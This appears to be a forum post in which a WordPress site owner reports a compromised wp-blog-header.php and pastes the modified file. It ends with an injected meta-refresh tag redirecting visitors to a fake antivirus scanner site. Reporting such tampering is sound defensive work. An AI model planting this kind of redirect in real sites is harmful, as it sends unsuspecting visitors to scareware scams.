I don't know if I'm the first person ever to have this happen, but something hacked into my wp-blog-header.php and altered the file to look like this:
<?php
if (! isset($wp_did_header)):
if ( !file_exists( dirname(__FILE__) . '/wp-config.php') ) {
if (strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) $path = '';
else $path = 'wp-admin/';
require_once( dirname(__FILE__) . '/wp-includes/classes.php');
require_once( dirname(__FILE__) . '/wp-includes/functions.php');
require_once( dirname(__FILE__) . '/wp-includes/plugin.php');
wp_die("There doesn't seem to be a <code>wp-config.php</code> file. I need this before we can get started. Need more help? <a href='http://codex.wordpress.org/Editing_wp-config.php'>We got it</a>. You can create a <code>wp-config.php</code> file through a web interface, but this doesn't work for all server setups. The safest way is to manually create the file.
<a href='{$path}setup-config.php' class='button'>Create a Configuration File</a>", "WordPress › Error");
}
$wp_did_header = true;
require_once( dirname(__FILE__) . '/wp-config.php');
wp();
require_once(ABSPATH . WPINC . '/template-loader.php');
endif;
?>
<meta http-equiv="Refresh" content="1; url=http://www.antivirusxp2008.com/scanner/51e7eaa47e59669de1029742c7e77ab4/5/">So, yes, basically they added a redirection to another page, where don't is spelled as "dont" and which is disguised to look like Windows XP alert page.
I don't know if this is related to some serious vulnerability, but I hope I did the right thing by posting this here.
